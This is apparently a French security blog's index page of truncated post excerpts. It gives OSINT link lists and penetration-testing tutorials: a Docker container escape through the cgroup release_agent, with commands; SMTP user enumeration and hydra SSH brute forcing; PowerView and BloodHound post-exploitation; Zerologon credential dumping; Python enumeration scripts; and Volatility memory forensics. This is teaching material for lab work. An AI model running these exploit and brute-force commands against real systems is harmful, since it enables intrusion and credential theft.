OSINT Links 3

Transport Railways ACW Railway (US) http://www.acwr.com/economic-development/rail-maps Association of American Railroads https://www.aar.org Association for Open Data of Public Transportation Secretariat Office (Japan) http://airport.odpt.org/index-e.html Archive Freight Rail Works http://archive.freightrailworks.org British Columbia Data https://catalogue.data.gov.bc.ca/dataset/railway-track-line Canadian Rail Research Laboratory http://carrl.ca Centre For Railway Research http://www.crr.iitkgp.ernet.in/crr/index.php Data.gov (India) https://data.gov.in/sector/railways Data.gov (Saudi Arabia) http://www.data.gov.sa/en/saudi-railways-organization Data.gov (US) https://catalog.data.gov/dataset?tags=railroad Data.deutschebahn http://data.deutschebahn.com/dataset Data.vancouver.ca (Canada) … Continuer la lecture

OSINT Links 2

Job Search Resources Tool Links Beyond http://www.beyond.com CampusCareerCenter http://www.campuscareercenter.com CareerBuilder http://www.careerbuilder.com College Recruiter https://www.collegerecruiter.com Craiglist http://losangeles.craigslist.org Dice http://www.dice.com Eluta (Canada) http://www.eluta.ca Eurojobs https://www.eurojobs.com Fish4Jobs http://www.fish4.co.uk Gigajob https://www.gigajob.com Glassdoor https://www.glassdoor.com Headhunter http://www.headhunter.com Indeed http://www.indeed.com JOBBÖRSE https://jobboerse.arbeitsagentur.de JobRobot https://www.jobrobot.de Jobs (Germany) https://www.jobs.de Jobs (Poland) http://www.jobs.pl Jobware (Germany) https://www.jobware.de Jobsite (UK) http://www.jobsite.co.uk Linkedin https://www.linkedin.com Monster http://www.monster.com Naukri (India) … Continuer la lecture

Recherche d’entreprises et de business

Entreprises Liens pour la recherche d’entreprises et d’informations sur celles-ci AIHIT AllStocksLinks https://www.aihitdata.com http://www.allstocks.com/links AngelList https://angel.co Annual Reports http://www.annualreports.com Big Red Directory https://www.bigreddirectory.com bikudo https://www.bikudo.com Bizeurope http://www.bizeurope.com Biznar https://biznar.com Bizstats http://www.bizstats.co.uk Bizstats http://www.bizstats.com Bloomberg http://www.bloomberg.com/research/company/overview/overview.asp brandchecker https://brandchecker.com Business Source https://www.ebscohost.com/academic/business-source-complete Bureau Van Dijk http://www.bvdinfo.com Buzzfile http://www.buzzfile.com Canadian Business Research https://www.canada.ca/en/services/business/research.html Canadian Business Resource http://www.cbr.ca Cedar … Continuer la lecture

Sortir d’un container docker

# Sur l'hôte docker run –rm -it –cap-add=SYS_ADMIN –security-opt apparmor=unconfined ubuntu bash # Dans le container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent #For a normal PoC ================= echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" … Continuer la lecture

Énumération d’utilisateurs avec SMTP

Pour voir la version du serveur SMTP msfconsole use auxiliary/scanner/smtp/smtp_version set rhosts 10.9.0.15 exploit Nous voulons connaître les usagers du système SMTP. ce sont probablement les mêmes usagers que le système msfconsole use auxiliary/scanner/smtp/smtp_enum set user_file /usr/share/seclists/Usernames/top-usernames-shortlist.txt set rhosts 10.9.0.15 exploit Essayer de trouver les mots de passe SSH avec la force brute hydra -t16 … Continuer la lecture

Post-Exploitation

Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilisé pour l’énumération après que vous ayez obtenu l’accèes au système. Vous trouvez les scripts utilisés dans cet archive powershell -ep bypass . .\PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* Énumération avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell … Continuer la lecture

Vulnérabilité zero logon

Objectif : utiliser la vulnérabilité Zero Logon pour outrepasser l’authentification sur la machine agissant comme controlleur de domaines Utiliser secretsdump.py pour obtenir les identifiants cracker les hashes avoir du plaisir Microsoft a choisi d’utiliser l’encryption AES-CFB8 pour la fonction ComputeNetlogonCredential de MS-NRPC. Le problème est le vecteur d’initialisation utilisé qui ne contient que des “0” … Continuer la lecture

Déterminer si un système est infecté en analysant la mémoire avec volatility

Quelque outils permettent d’avoir un image de la mémoire FTK Image Redline DumpIt.exe win32dd.exe / win64dd.exe (support psexec) Ces outils permettent d’avoir un format raw de la mémoire. Sur windows, vous avez aussi le fichier d’hibernation %SystemDrive%/hiberfil.sys qui est une image compressée. Pour les machines virtuelles vmware : .vmem file Hyper-v : .bin file Parallels … Continuer la lecture

Scripts python pour l’énumération

Énumération des sous-domaines import requests import sys sub_list = open("subdomains.txt").read() subdoms = sub_list.splitlines() for sub in subdoms:     sub_domains = f"http://{sub}.{sys.argv[1]}"     try:         requests.get(sub_domains)          except requests.ConnectionError:         pass          else:         print("Valid domain: ",sub_domains)   Énumération des répertoires import requests import sys sub_list = open("wordlist.txt").read() directories = sub_list.splitlines() for dir in directories:     dir_enum = f"http://{sys.argv[1]}/{dir}.html"     r = requests.get(dir_enum)     if … Continuer la lecture